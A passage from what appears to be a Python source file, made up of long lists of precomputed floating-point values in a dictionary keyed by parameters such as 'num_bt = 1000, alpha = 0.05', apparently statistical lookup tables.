0.3857497558593811, 0.38674063110352175, 0.3877315063476624, 0.38872250366211547, 0.38971362304688106, 0.39070474243164666, 0.39169604492188104, 0.3926873474121154, 0.3936787719726623, 0.39467031860352164, 0.39566186523438096, 0.3966535339355528, 0.3976453247070372, 0.3986371765136778, 0.3996290893554747, 0.4006211242675841, 0.4016132202148498, 0.40260537719727174, 0.4035976562500061, 0.4045899963378967, 0.40558245849609986, 0.40657498168945927, 0.40756756591797494, 0.40856027221680313, 0.4095530395507876, 0.4105458679199283, 0.41153881835938144, 0.41253182983399084, 0.4135249023437565, 0.4145180969238347, 0.4155113525390691, 0.4165047302246161, 0.4174981689453192, 0.4184916687011786, 0.4194852905273505, 0.4204789733886787, 0.4214727172851631, 0.42246658325196007, 0.4234605102539132, 0.42445449829102255, 0.42544860839844445, 0.4264427795410226, 0.42743701171875703, 0.428431365966804, 0.4294257812500071, 0.4304203186035227, 0.4314149169921946, 0.43240957641602273, 0.43340429687500714, 0.4343991394043041, 0.43539404296875717, 0.4363890686035228, 0.43738415527344465, 0.4383793029785228, 0.43937457275391345, 0.4403698425293041, 0.44136529541016345, 0.4423607482910228, 0.44335632324219465, 0.4443519592285228, 0.4453477172851634, 0.44634353637696034, 0.4473394165039134, 0.448335418701179, 0.44933148193360084, 0.45032760620117895, 0.4513238525390696, 0.4523201599121165, 0.45331652832031955, 0.45431295776367886, 0.4553095092773507, 0.45630618286133506, 0.45730285644531943, 0.4582996520996163, 0.45929650878906936, 0.4602934875488349, 0.46129052734375675, 0.46228762817383484, 0.46328485107422546, 0.46428213500977233, 0.46527947998047536, 0.46627688598633465, 0.46727441406250647, 0.46827200317383455, 0.46926971435547515, 0.470267486572272, 0.47126531982422515, 0.4722632751464908, 0.47326123046875646, 0.4742593688964908, 0.4752575073242251, 0.47625576782227197, 0.4772540893554751, 0.47825247192383447, 0.47925097656250637, 0.48024954223633454, 0.48124822998047523, 0.4822469787597722, 0.4832457885742253, 0.48424465942383466, 0.48524365234375655, 0.4862427062988347, 0.4872418212890691, 0.48824105834961606, 0.48924035644531916, 0.4902397155761785, 0.4912391967773504, 0.49223873901367854, 0.4932384033203192, 0.4942380676269599, 0.49523785400391296, 0.49623776245117857, 0.4972376708984442, 0.4982377014160223, 0.49923785400391296, 0.5002380065918036, 0.5012382812500068, 0.5022386779785225, 0.5032390747070382, 0.5042395935058663, 0.505240234375007, 0.5062408752441475, 0.5072416381836006, 0.5082425231933662, 0.5092434082031317, 0.5102444152832099, 0.5112454833984442, 0.5122466735839911, 0.5132479248046943, 0.5142492370605537, 0.5152506713867255, 0.5162521667480537, 0.5172537231445381, 0.5182554016113349, 0.5192571411132879, 0.5202589416503972, 0.521260864257819, 0.5222628479003971, 0.5232648925781315, 0.5242670593261783, 0.5252692871093815, 0.5262715759277409, 0.5272739868164127, 0.5282764587402409, 0.5292790527343815, 0.530281646728522, 0.531284362792975, 0.5322872009277405, 0.5332901000976623, 0.5342930603027404, 0.5352960815429747, 0.5362992248535216, 0.5373024291992247, 0.5383057556152403, 0.5393091430664122, 0.5403125915527404, 0.541316162109381, 0.542319793701178, 0.5433234863281312, 0.544327301025397, 0.5453311767578188, 0.546335113525397, 0.5473391723632876, 0.5483432922363344, 0.5493475341796937, 0.5503517761230531, 0.5513562011718812, 0.5523606262207094, 0.55336517333985, 0.5543698425293032, 0.5553745117187564, 0.5563793029785221, 0.5573842163086004, 0.5583891906738349, 0.5593942260742256, 0.5603993225097726, 0.5614045410156322, 0.5624098815918042, 0.563415222167976, 0.5644207458496165, 0.5654262695312572, 0.5664319152832104, 0.5674376220703198, 0.5684434509277417, 0.56944934082032, 0.5704552917480544, 0.5714613647461014, 0.5724674987793047, 0.5734737548828205, 0.5744800720214924, 0.5754864501953205, 0.576492950439461, 0.5774995727539142, 0.5785061950683673, 0.579512939453133, 0.5805198059082112, 0.5815267333984456, 0.5825337219238363, 0.5835408325195396, 0.5845480041503991, 0.5855552368164149, 0.586562591552743, 0.5875700073242273, 0.5885775451660241, 0.5895851440429772, 0.5905928649902429, 0.5916006469726648, 0.5926085510253992, 0.5936165161132899, 0.5946245422363369, 0.5956326904296964, 0.5966408996582121, 0.5976492309570403, 0.5986576232910245, 0.599666076660165, 0.6006746520996181, 0.6016833496093837, 0.6026921081543056, 0.6037009277343838, 0.6047098693847744, 0.6057188720703214, 0.6067279968261808, 0.6077371826171966, 0.6087464904785247, 0.6097558593750089, 0.6107653503418057, 0.6117749023437588, 0.6127845764160244, 0.6137943115234462, 0.6148041076660243, 0.615814025878915, 0.6168240661621182, 0.6178341674804776, 0.6188443298339933, 0.6198546142578214, 0.6208650207519618, 0.6218754882812586, 0.6228860168457117, 0.6238966674804772, 0.6249074401855553, 0.6259182739257897, 0.6269291687011803, 0.6279401855468835, 0.6289513244628991, 0.629962524414071, 0.6309738464355553, 0.6319852294921958, 0.6329966735839926, 0.6340083007812581, 0.6350199279785237, 0.636031738281258, 0.6370436096191486, 0.6380555419921955, 0.6390675964355549, 0.6400797119140705, 0.6410919494628986, 0.6421043090820392, 0.6431167297363359, 0.6441292724609452, 0.6451418762207107, 0.6461546020507888, 0.6471674499511794, 0.6481803588867262, 0.6491933288574293, 0.6502064208984449, 0.651219635009773, 0.6522329711914135, 0.6532463684082103, 0.6542598266601632, 0.6552734069824288, 0.6562871093750068, 0.6573009338378973, 0.6583148193359442, 0.6593288269043035, 0.6603428955078191, 0.6613570861816471, 0.6623713378906314, 0.6633857727050844, 0.6644002075195373, 0.6654148254394591, 0.6664295043945371, 0.6674443054199276, 0.6684591674804744, 0.6694741516113337, 0.6704892578125056, 0.6715044860839899, 0.6725197753906306, 0.6735351867675837, 0.6745506591796931, 0.675566253662115, 0.6765819702148493, 0.6775978088378961, 0.6786137084960991, 0.6796297302246147, 0.6806458740234428, 0.6816621398925834, 0.6826784667968803, 0.6836949157714897, 0.6847114257812553, 0.6857281188964898, 0.6867448730468805, 0.6877617492675837, 0.6887786865234432, 0.6897958068847714, 0.6908129882812556, 0.6918302917480524, 0.6928476562500056, 0.6938652038574274, 0.6948828125000056, 0.6959005432128963, 0.6969183959960995, 0.6979363708496152, 0.6989544067382871, 0.6999726257324276, 0.7009909057617244, 0.7020093078613338, 0.7030278320312556, 0.7040464172363338, 0.7050651855468807, 0.7060840148925839, 0.7071029663085996, 0.7081220397949277, 0.7091412353515684, 0.7101605529785214, 0.711179992675787, 0.7121994934082089, 0.7132191772460995, 0.7142389221191464, 0.7152587890625058, 0.7162787780761777, 0.717298889160162, 0.7183191833496151, 0.7193395385742244, 0.72035995483399, 0.7213805541992243, 0.7224012756347712, 0.7234221191406306, 0.7244430847168024, 0.7254641723632868, 0.7264853210449272, 0.7275066528320365, 0.7285281066894583, 0.7295496826171927, 0.7305713195800833, 0.7315931396484426, 0.7326150817871144, 0.7336371459960987, 0.7346593322753955, 0.7356816406250047, 0.7367040710449265, 0.7377266235351608, 0.7387492980957077, 0.7397721557617233, 0.740795074462895, 0.7418181762695356, 0.7428413391113323, 0.7438646850585978, 0.7448881530761758, 0.7459117431640664, 0.7469355163574257, 0.7479593505859413, 0.7489833679199255, 0.7500074462890659, 0.7510317077636751, 0.7520561523437531, 0.7530806579589874, 0.7541053466796904, 0.755130157470706, 0.756155090332034, 0.7571801452636745, 0.7582053833007837, 0.7592307434082054, 0.7602562255859396, 0.7612818908691427, 0.762307617187502, 0.7633335876464861, 0.7643596191406264, 0.7653858337402356, 0.7664121704101573, 0.7674386901855478, 0.7684653320312508, 0.7694920959472663, 0.7705190429687506, 0.7715461120605475, 0.7725733642578131, 0.7736007385253911, 0.7746282348632817, 0.7756559143066409, 0.776683776855469, 0.7777117614746095, 0.7787398681640626, 0.7797681579589845, 0.7807966308593751, 0.7818252258300783, 0.7828540039062502, 0.7838829040527345, 0.7849119873046876, 0.7859411926269532, 0.7869705810546875, 0.7880001525878907, 0.7890299072265625, 0.7900597839355469, 0.7910897827148436, 0.7921200256347655, 0.7931503906249998, 0.794180938720703, 0.7952116699218748, 0.7962425231933591, 0.7972735595703121, 0.7983047790527339, 0.7993361816406245, 0.8003677673339838, 0.8013994750976556, 0.8024314270019525, 0.8034635009765617, 0.8044957580566398, 0.8055281982421866, 0.8065608215332022, 0.8075936279296864, 0.8086266174316393, 0.8096597900390611, 0.8106932067871079, 0.8117267456054672, 0.8127604675292952, 0.813794372558592, 0.8148285217285137, 0.815862792968748, 0.8168973083496073, 0.8179320068359354, 0.8189668884277322, 0.8200019531249979, 0.8210372619628884, 0.8220726928710914, 0.8231084289550757, 0.8241442871093726, 0.8251803894042945, 0.8262166748046852, 0.8272532043457009, 0.8282899169921852, 0.8293268127441383, 0.8303639526367165, 0.8314012756347634, 0.8324388427734353, 0.8334766540527322, 0.8345146484374978, 0.8355528869628884, 0.8365913085937479, 0.8376299743652321, 0.8386688842773414, 0.8397080383300758, 0.8407473754882789, 0.841786956787107, 0.8428267822265602, 0.8438668518066382, 0.8449071655273414, 0.8459476623535132, 0.8469884643554663, 0.8480295104980443, 0.8490707397460912, 0.8501122741699192, 0.8511540527343723, 0.8521960754394503, 0.8532384033203096, 0.8542809143066378, 0.8553237304687472, 0.8563667907714815, 0.8574101562499971, 0.8584537658691377, 0.8594976196289034, 0.8605417785644504, 0.8615862426757785, 0.8626309509277316, 0.863675964355466, 0.8647212219238255, 0.8657667846679661, 0.866812652587888, 0.8678588256835912, 0.8689053039550755, 0.8699520874023411, 0.8709991149902317, 0.8720465087890599, 0.8730942077636693, 0.8741422119140599, 0.8751905212402318, 0.8762391967773412, 0.8772881774902318, 0.8783374633789036, 0.879387115478513, 0.8804371337890599, 0.881487457275388, 0.8825381469726538, 0.8835892028808568, 0.8846405639648413, 0.8856922912597632, 0.886744445800779, 0.887796905517576, 0.8888497924804667, 0.8899030456542949, 0.8909566650390605, 0.89201071166992, 0.8930651245117168, 0.8941199645996075, 0.8951751708984357, 0.8962308654785137, 0.8972869262695294, 0.8983434143066388, 0.899400329589842, 0.900457733154295, 0.9015155639648419, 0.9025738220214824, 0.903632568359373, 0.9046917419433572, 0.9057514648437478, 0.906811614990232, 0.9078722534179663, 0.9089334411621067, 0.9099951171874973, 0.9110572814941379, 0.9121199951171847, 0.9131832580566378, 0.9142470703124973, 0.9153114318847629, 0.9163763427734348, 0.9174418640136691, 0.9185079345703097, 0.9195746765136691, 0.9206419677734347, 0.9217098693847627, 0.9227784423828097, 0.9238476867675752, 0.9249175415039033, 0.9259881286621064, 0.9270593872070282, 0.9281313781738249, 0.9292041015624966, 0.9302774963378871, 0.9313517456054652, 0.9324267272949184, 0.9335025024414026, 0.9345790710449183, 0.9356565551757777, 0.9367348327636683, 0.9378140258789026, 0.9388941345214806, 0.9399751586914024, 0.941057098388668, 0.9421400756835899, 0.9432240905761681, 0.9443091430664025, 0.9453952331542931, 0.9464824218749962, 0.9475708312988242, 0.9486603393554648, 0.9497511291503867, 0.95084320068359, 0.9519365539550743, 0.9530312499999961, 0.9541274108886679, 0.9552249755859336, 0.9563241271972618, 0.9574248046874961, 0.9585271301269492, 0.9596312255859335, 0.9607370910644492, 0.9618448486328085, 0.9629546203613241, 0.964066406249996, 0.9651803894042928, 0.9662966308593709, 0.9674153137206989, 0.9685365600585895, 0.969660491943355, 0.9707873535156205, 0.9719172058105424, 0.9730503540039018, 0.9741870422363237, 0.9753275146484331, 0.976472015380855, 0.9776209716796831, 0.9787746887206988, 0.9799337158203082, 0.9810985412597611, 0.9822698364257768, 0.9834483337402299, 0.9846350097656206, 0.9858310241699174, 0.987037719726558, 0.9882571716308547, 0.9894917602539016, 0.9907451477050735, 0.9920223388671828, 0.9933315124511671, 0.9946865234374952, 0.9961158752441358, 0.9977000732421827], # skipcq: FLK-E501 'num_bt = 1000, alpha = 0.05,': [5.1300048828125e-05, 0.00035546875, 0.0008181457519531249, 0.001367431640625, 0.0019721374511718747, 0.002616149902343749, 0.0032897644042968735, 0.003986877441406248, 0.0047030334472656235, 0.005435119628906249, 0.006180877685546875, 0.006938415527343749, 0.007706207275390624, 0.008483215332031249, 0.009268402099609375, 0.010061035156249998, 0.010860321044921874, 0.011665710449218752, 0.012476776123046877, 0.013293029785156254, 0.01411404418945313, 0.014939575195312506, 0.015769256591796878, 0.016602905273437503, 0.017440155029296876, 0.0182808837890625, 0.019124908447265623, 0.01997198486328125, 0.020821990966796877, 0.0216748046875, 0.022530242919921874, 0.02338818359375, 0.024248565673828125, 0.0251112060546875, 0.02597610473632813, 0.02684307861328126, 0.02771206665039063, 0.028583007812500005, 0.029455841064453134, 0.03033050537109376, 0.03120687866210939, 0.03208489990234376, 0.03296456909179689, 0.03384582519531252, 0.0347286071777344, 0.03561279296875002, 0.03649844360351565, 0.03738549804687503, 0.038273895263671906, 0.03916351318359378, 0.04005447387695316, 0.04094659423828129, 0.04183999633789067, 0.04273449707031255, 0.04363015747070318, 0.04452685546875006, 0.04542471313476568, 0.046323608398437556, 0.04722348022460943, 0.048124389648437564, 0.04902621459960944, 0.04992907714843756, 0.0508327941894532, 0.05173748779296882, 0.052643035888671946, 0.053549438476562565, 0.05445669555664069, 0.05536480712890631, 0.05627371215820319, 0.05718347167968756, 0.05809396362304694, 0.05900524902343756, 0.05991732788085944, 0.06083007812500007, 0.06174356079101569, 0.06265783691406254, 0.06357272338867193, 0.06448834228515629, 0.06540463256835943, 0.0663215942382813, 0.06723916625976567, 0.0681574096679688, 0.06907632446289066, 0.06999578857421879, 0.07091592407226566, 0.0718366088867188, 0.07275790405273444, 0.07367980957031256, 0.07460226440429693, 0.07552526855468755, 0.07644888305664069, 0.07737298583984381, 0.07829763793945319, 0.07922283935546881, 0.08014852905273445, 0.08107476806640634, 0.08200155639648449, 0.08292877197265636, 0.08385653686523448, 0.08478479003906261, 0.08571347045898448, 0.08664270019531259, 0.08757235717773446, 0.08850244140625008, 0.08943307495117195, 0.09036407470703131, 0.09129556274414069, 0.09222747802734382, 0.09315982055664071, 0.09409265136718759, 0.09502584838867195, 0.09595947265625007, 0.09689352416992195, 0.09782800292968757, 0.0987628479003907, 0.09969812011718757, 0.1006338195800782, 0.10156982421875008, 0.10250631713867195, 0.10344311523437508, 0.10438034057617196, 0.10531793212890633, 0.10625588989257823, 0.10719415283203138, 0.10813284301757825, 0.10907189941406262, 0.1100113220214845, 0.11095104980468765, 0.11189114379882828, 0.1128316040039064, 0.11377243041992202, 0.11471350097656266, 0.11565499877929702, 0.11659680175781265, 0.11753890991210952, 0.11848138427734389, 0.11942416381835952, 0.1203672485351564, 0.12131063842773454, 0.12225439453125017, 0.12319839477539082, 0.12414276123046897, 0.1250874328613284, 0.12603234863281282, 0.1269776306152347, 0.12792315673828158, 0.12886904907226598, 0.12981518554687538, 0.13076162719726603, 0.13170831298828167, 0.13265536499023484, 0.133602661132813, 0.13455020141601615, 0.13549804687500056, 0.13644619750976617, 0.13739459228515677, 0.13834323120117237, 0.13929223632812548, 0.1402414245605474, 0.14119091796875055, 0.1421406555175787, 0.14309063720703186, 0.14404092407226626, 0.14499145507812566, 0.14594223022461006, 0.14689324951171945, 0.14784451293945383, 0.14879608154296942, 0.1497478332519538, 0.15069989013671942, 0.15165219116211004, 0.15260467529296945, 0.15355746459961006, 0.15451043701171946, 0.15546371459961006, 0.15641717529296945, 0.15737088012695383, 0.1583248291015632, 0.15927902221679757, 0.160233459472657, 0.16118807983398514, 0.1621429443359383, 0.16309805297851643, 0.16405340576171956, 0.16500894165039143, 0.1659647216796883, 0.16692068481445393, 0.16787689208984458, 0.1688333435058602, 0.16978997802734463, 0.1707467956542978, 0.1717039184570322, 0.17266116333007908, 0.17361865234375096, 0.17457638549804783, 0.17553430175781348, 0.17649240112304787, 0.1774507446289073, 0.17840927124023548, 0.17936804199218864, 0.18032699584961054, 0.18128613281250117, 0.18224545288086058, 0.183205017089845, 0.18416476440429813, 0.18512469482422, 0.1860848083496106, 0.1870451660156262, 0.1880057067871106, 0.1889664306640637, 0.18992733764648562, 0.19088842773437625, 0.19184976196289188, 0.19281121826172004, 0.1937729187011732, 0.1947347412109388, 0.19569680786132942, 0.19665905761718883, 0.19762149047851696, 0.19858404541015756, 0.19954684448242316, 0.20050982666015754, 0.20147299194336066, 0.20243627929687624, 0.20339981079101682, 0.20436346435546993, 0.20532736206054802, 0.20629138183593865, 0.20725558471679806, 0.20822003173828246, 0.20918460083007934, 0.21014929199218874, 0.21111422729492313, 0.21207928466797, 0.21304458618164185, 0.21401000976562623, 0.21497561645507934, 0.21594134521484498, 0.21690731811523561, 0.21787341308593877, 0.21883969116211066, 0.21980609130859508, 0.22077267456054822, 0.2217394409179701, 0.2227063903808607, 0.22367346191406384, 0.2246407165527357, 0.2256081542968763, 0.22657571411132943, 0.22754345703125134, 0.22851138305664198, 0.22947943115234515, 0.23044766235351705, 0.23141601562500147, 0.23238455200195463, 0.2333532714843765, 0.23432211303711092, 0.2352910766601578, 0.23626028442382968, 0.23722955322265782, 0.23819906616211095, 0.23916864013672035, 0.24013845825195473, 0.24110833740234539, 0.24207846069336103, 0.24304864501953294, 0.24401901245117358, 0.244989562988283, 0.2459602355957049, 0.24693109130859553, 0.24790206909179868, 0.2488731689453143, 0.24984445190429871, 0.25081585693359565, 0.25178744506836126, 0.2527591552734394, 0.25373098754883006, 0.2547030029296894, 0.25567514038086125, 0.2566474609375019, 0.2576198425292988, 0.25859246826172066, 0.2595651550292988, 0.2605380249023457, 0.261511016845705, 0.2624841918945331, 0.26345742797851746, 0.2644308471679705, 0.2654044494628923, 0.2663781738281267, 0.2673519592285173, 0.26832598876953284, 0.26930007934570466, 0.27027435302734526, 0.2712487487792984, 0.27222326660156404, 0.27319796752929837, 0.27417272949218896, 0.27514767456054834, 0.27612274169922024, 0.27709799194336093, 0.2780733032226579, 0.2790487976074235, 0.28002441406250167, 0.28100015258789235, 0.2819760742187517, 0.2829520568847673, 0.2839282226562517, 0.28490451049804866, 0.285880920410158, 0.28685745239257987, 0.28783410644531426, 0.28881094360351733, 0.28978784179687667, 0.2907649230957048, 0.29174212646484543, 0.2927194519042985, 0.29369689941406407, 0.2946744689941422, 0.2956521606445328, 0.29662997436523586, 0.2976079711914077, 0.2985860290527358, 0.2995642700195327, 0.3005426330566421, 0.301521118164064, 0.3024996643066421, 0.303478393554689, 0.30445724487304837, 0.3054362182617203, 0.30641531372070474, 0.3073945312500017, 0.3083738708496111, 0.30935339355468927, 0.3103329772949237, 0.31131268310547067, 0.31229251098633004, 0.3132725219726582, 0.3142525939941426, 0.3152327880859396, 0.31621310424804894, 0.3171936035156271, 0.3181741638183615, 0.31915484619140844, 0.3201356506347678, 0.3211166381835959, 0.3220976867675803, 0.32307885742187725, 0.3240601501464866, 0.32504156494140846, 0.32602310180664285, 0.32700476074218976, 0.3279865417480491, 0.32896844482422094, 0.3299504699707053, 0.3309326171875022, 0.33191488647461165, 0.33289721679687734, 0.3338797302246117, 0.3348623657226586, 0.33584506225586175, 0.3368278808593774, 0.3378108825683619, 0.3387939453125026, 0.33977713012695576, 0.34076043701172143, 0.3417438659667996, 0.34272741699219034, 0.34371109008789347, 0.34469482421875286, 0.34567874145508104, 0.3466627197265655, 0.34764682006836245, 0.3486311035156281, 0.34961544799805, 0.35059991455078443, 0.3515844421386751, 0.3525691528320345, 0.3535539855957064, 0.35453887939453455, 0.3555238952636752, 0.3565090332031283, 0.35749429321289394, 0.3584796752929721, 0.35946517944336276, 0.3604507446289097, 0.3614364929199253, 0.36242230224609717, 0.36340823364258157, 0.3643942871093785, 0.36538046264648794, 0.36636669921875364, 0.36735311889648803, 0.3683395996093787, 0.36932620239258185, 0.37031292724609755, 0.3712997131347695, 0.37228668212891025, 0.37327371215820726, 0.3742608642578167, 0.37524813842773863, 0.3762355346679731, 0.37722299194336384, 0.37821063232422325, 0.3791983337402389, 0.3801861572265671, 0.38117410278320785, 0.38216210937500483, 0.38315023803711423, 0.3841385498046924, 0.3851268615722706, 0.3861153564453176, 0.38710397338867697, 0.3880926513671926, 0.3890814514160208, 0.3900703735351615, 0.39105935668945846, 0.3920485229492241, 0.393037750244146, 0.3940270996093804, 0.3950165100097711, 0.3960061035156305, 0.3969957580566461, 0.39798553466797426, 0.39897543334961494, 0.3999653930664119, 0.40095547485352123, 0.4019456787109431, 0.4029360046386775, 0.40392645263672444, 0.4049169616699275, 0.4059075927734431, 0.40689834594727126, 0.40788916015625565, 0.4088801574707087, 0.40987121582031805, 0.41086233520508364, 0.411853637695318, 0.41284500122070866, 0.4138364868164117, 0.4148280944824273, 0.41581976318359914, 0.4168115539550835, 0.4178034667968804, 0.4187955017089898, 0.4197875976562555, 0.42077987670898986, 0.4217721557617242, 0.42276461791992737, 0.4237571411132868, 0.4247497863769587, 0.42574255371094316, 0.42673544311524014, 0.4277283935546933, 0.42872146606445893, 0.4297146606445371, 0.43070791625977156, 0.43170129394531853, 0.4326947937011779, 0.43368835449219356, 0.434682098388678, 0.4356759033203187, 0.43666976928711565, 0.4376638183593813, 0.4386579284668032, 0.4396521606445376, 0.4406464538574283, 0.44164093017578765, 0.4426354675293033, 0.44363006591797516, 0.44462484741211583, 0.44561968994141277, 0.4466146545410221, 0.4476096801757877, 0.44860482788086586, 0.4496000976562565, 0.4505954895019596, 0.45159094238281894, 0.4525865173339908, 0.4535822143554752, 0.4545780334472721, 0.45557391357422516, 0.45656991577149075, 0.4575659790039126, 0.45856222534180324, 0.45955853271485014, 0.4605549011230532, 0.46155145263672503, 0.46254806518555314, 0.46354479980469376, 0.46454159545899065, 0.4655385742187562, 0.4665355529785218, 0.46753271484375614, 0.46852993774414675, 0.4695272827148498, 0.47052474975586533, 0.4715223388671934, 0.47251998901367775, 0.4735177612304746, 0.47451559448242775, 0.4755135498046934, 0.47651162719727147, 0.47750982666016206, 0.4785080871582089, 0.4795064697265683, 0.4805049743652402, 0.48150354003906837, 0.4825022888183653, 0.4835010375976623, 0.4844999694824279, 0.4854989624023498, 0.4864980773925842, 0.48749731445313116, 0.48849661254883425, 0.48949603271484987, 0.490495574951178, 0.4914951782226624, 0.4924949645996155, 0.4934947509765686, 0.49449472045899046, 0.4954947509765686, 0.49649490356445924, 0.4974951782226623, 0.49849551391602165, 0.49949603271484977, 0.5004965515136779, 0.5014972534179748, 0.5024980163574279, 0.5034989013671934, 0.5044999084472716, 0.5055009765625059, 0.5065021667480528, 0.5075034790039122, 0.5085048522949279, 0.5095064086914122, 0.5105080261230527, 0.5115097045898495, 0.512511566162115, 0.5135134887695368, 0.5145154724121149, 0.5155176391601618, 0.5165198669433649, 0.5175222167968806, 0.5185246887207087, 0.519527221679693, 0.5205298767089898, 0.521532653808599, 0.5225355529785208, 0.5235385131835989, 0.5245415954589895, 0.5255447998046926, 0.526548065185552, 0.5275514526367239, 0.5285549621582083, 0.5295585937500052, 0.5305622863769585, 0.5315661010742242, 0.5325700378418023, 0.533574096679693, 0.5345782165527398, 0.5355824584960992, 0.5365868225097711, 0.5375913085937555, 0.5385958557128961, 0.5396005249023493, 0.540605316162115, 0.541610168457037, 0.5426152038574278, 0.5436203002929748, 0.5446255187988344, 0.5456307983398502, 0.5466361999511784, 0.5476417236328189, 0.5486473693847721, 0.5496531372070378, 0.5506589660644597, 0.5516649169921942, 0.5526709899902412, 0.5536771850586008, 0.5546834411621165, 0.5556898193359447, 0.5566963195800853, 0.5577029418945384, 0.5587096252441478, 0.559716491699226, 0.5607234191894604, 0.5617304077148512, 0.5627375793457107, 0.5637448120117264, 0.5647522277832108, 0.5657597045898514, 0.5667672424316482, 0.5677749633789139, 0.5687827453613358, 0.5697906494140702, 0.5707986755371172, 0.5718068237304766, 0.5728150329589924, 0.5738234252929767, 0.5748318786621173, 0.5758404541015704, 0.576849151611336, 0.5778579101562579, 0.5788668518066485, 0.5798758544921955, 0.5808849792480549, 0.5818942260742268, 0.5829035339355548, 0.5839130249023515, 0.5849225769043046, 0.5859322509765702, 0.5869420471191483, 0.587951965332039, 0.5889620056152421, 0.5899721679687578, 0.5909823913574297, 0.5919927368164138, 0.5930032043457106, 0.59401379394532, 0.5950245056152418, 0.5960353393554761, 0.5970462341308668, 0.5980573120117262, 0.5990684509277419, 0.60007971191407, 0.6010910949707106, 0.6021026000976636, 0.6031142272949291, 0.604125915527351, 0.6051377868652416, 0.6061497192382884, 0.6071618347168041, 0.6081740112304759, 0.6091863098144602, 0.610198730468757, 0.6112112731933662, 0.612223937988288, 0.6132366638183661, 0.6142495727539129, 0.6152626037597723, 0.6162756958007879, 0.6172889709472721, 0.6183023071289125, 0.6193157653808655, 0.6203294067382873, 0.6213431091308653, 0.6223569335937559, 0.623370880126959, 0.6243849487304746, 0.6253991394043026, 0.6264134521484431, 0.6274278869628961, 0.6284424438476616, 0.6294571228027396, 0.6304719238281301, 0.6314867858886769, 0.6325018310546925, 0.6335169982910206, 0.6345322875976612, 0.6355476989746144, 0.6365631713867238, 0.6375788269043019, 0.6385946044921925, 0.6396105041503956, 0.6406265258789111, 0.6416426086425829, 0.6426588745117235, 0.6436752624511767, 0.6446917724609423, 0.6457084045410205, 0.6467251586914112, 0.6477420349121145, 0.6487590942382864, 0.6497762145996144, 0.6507934570312549, 0.6518108825683643, 0.6528283691406299, 0.6538459777832081, 0.654863769531255, 0.6558816833496145, 0.6568997192382864, 0.6579178161621144, 0.6589361572265674, 0.6599545593261767, 0.6609730834960986, 0.661991729736333, 0.6630105590820362, 0.6640294494628957, 0.6650485229492238, 0.6660677185058644, 0.6670870361328175, 0.6681064758300831, 0.6691260986328175, 0.6701457824707081, 0.6711656494140675, 0.6721856384277394, 0.6732057495117237, 0.6742259826660205, 0.6752463989257861, 0.6762669372558642, 0.6772875366210985, 0.6783083801269579, 0.6793292846679736, 0.6803503112793017, 0.6813715209960985, 0.6823928527832078, 0.6834143676757859, 0.6844359436035202, 0.6854577026367233, 0.686479583740239, 0.6875016479492232, 0.6885237731933637, 0.6895460815429729, 0.690568572998051, 0.6915911254882853, 0.6926138610839884, 0.693636718750004, 0.6946597595214882, 0.6956829223632849, 0.6967062072753941, 0.6977296142578159, 0.6987532043457064, 0.6997769775390658, 0.7008008117675814, 0.7018248291015655, 0.7028490295410185, 0.7038733520507839, 0.7048977966308619, 0.7059224243164087, 0.706947174072268, 0.7079720458984398, 0.7089971008300803, 0.7100223388671895, 0.7110476989746112, 0.7120731811523454, 0.7130988464355484, 0.714124633789064, 0.7151506042480481, 0.7161766967773447, 0.7172029724121102, 0.7182293701171881, 0.7192559509277349, 0.7202827148437504, 0.7213096008300784, 0.722336608886719, 0.7233638000488284, 0.7243911743164064, 0.725418670654297, 0.7264463500976562, 0.7274742126464843, 0.7285021972656248, 0.7295303649902342, 0.730558654785156, 0.7315871276855467, 0.7326157836914061, 0.733644561767578, 0.7346735229492186, 0.7357026672363279, 0.736731994628906, 0.7377614440917967, 0.7387910766601561, 0.7398208923339842, 0.7408508300781248, 0.7418809509277341, 0.7429112548828122, 0.743941741943359, 0.7449724121093747, 0.7460032043457028, 0.7470341796874996, 0.7480653381347652, 0.7490966796874995, 0.7501282043457026, 0.7511599121093744, 0.752191802978515, 0.7532238159179679, 0.754256072998046, 0.7552884521484365, 0.7563210144042959, 0.7573538208007801, 0.7583867492675768, 0.7594198608398423, 0.7604532165527328, 0.7614866943359359, 0.7625203552246076, 0.7635542602539044, 0.7645882873535136, 0.7656225585937478, 0.7666569519042946, 0.7676915893554664, 0.7687264099121071, 0.7697614135742165, 0.7707966613769507, 0.7718320312499974, 0.7728676452636692, 0.7739034423828098, 0.7749394226074192, 0.7759755859374974, 0.7770119934082006, 0.7780485839843725, 0.7790853576660132, 0.7801223754882788, 0.7811595153808569, 0.7821969604492164, 0.7832345275878883, 0.7842723999023414, 0.785310394287107, 0.7863486328124977, 0.7873870544433571, 0.7884257202148414, 0.7894646301269507, 0.7905037231445288, 0.7915429992675757, 0.7925825195312475, 0.7936222839355443, 0.7946622314453099, 0.7957024230957005, 0.7967428588867161, 0.7977834777832004, 0.7988243408203096, 0.7998654479980439, 0.800906738281247, 0.8019482727050751, 0.8029901123046844, 0.8040320739746062, 0.8050743408203093, 0.8061168518066374, 0.8071595458984343, 0.8082025451660124, 0.8092457275390593, 0.8102892150878874, 0.8113328857421843, 0.8123768615722625, 0.8134210205078095, 0.8144654846191377, 0.8155101928710907, 0.8165551452636689, 0.8176003417968721, 0.8186458435058565, 0.8196915283203096, 0.820737518310544, 0.8217838134765597, 0.822830291748044, 0.8238770751953096, 0.8249241638183565, 0.8259714965820284, 0.8270190734863253, 0.8280669555664034, 0.8291151428222628, 0.8301635742187471, 0.8312123107910127, 0.8322612915039033, 0.8333106384277313, 0.8343602294921845, 0.8354100646972625, 0.8364602661132782, 0.8375107727050751, 0.838561523437497, 0.8396125793457002, 0.8406640014648409, 0.8417156677246066, 0.8427677001953099, 0.8438200378417943, 0.84487268066406, 0.845925628662107, 0.8469788818359352, 0.8480325012207007, 0.8490864257812477, 0.850140716552732, 0.8511953124999977, 0.8522502746582009, 0.8533055419921852, 0.8543611755371071, 0.8554171752929666, 0.8564734802246071, 0.8575302124023415, 0.8585872497558572, 0.8596446533203103, 0.8607024230957009, 0.8617606201171851, 0.8628191223144507, 0.8638780517578101, 0.8649373474121068, 0.8659970092773411, 0.8670570983886692, 0.8681175537109348, 0.8691784362792941, 0.8702396850585908, 0.8713013610839814, 0.8723634643554657, 0.8734259948730438, 0.8744889526367157, 0.8755523376464812, 0.8766161499023407, 0.8776803894042938, 0.8787450561523408, 0.8798102111816376, 0.8808758544921845, 0.8819419250488251, 0.8830084838867157, 0.8840754699707, 0.8851430053710906, 0.8862109680175748, 0.8872794799804654, 0.8883484802246059, 0.8894179687499965, 0.8904880065917932, 0.89155853271484, 0.8926296081542929, 0.8937012329101522, 0.8947733459472614, 0.8958460693359331, 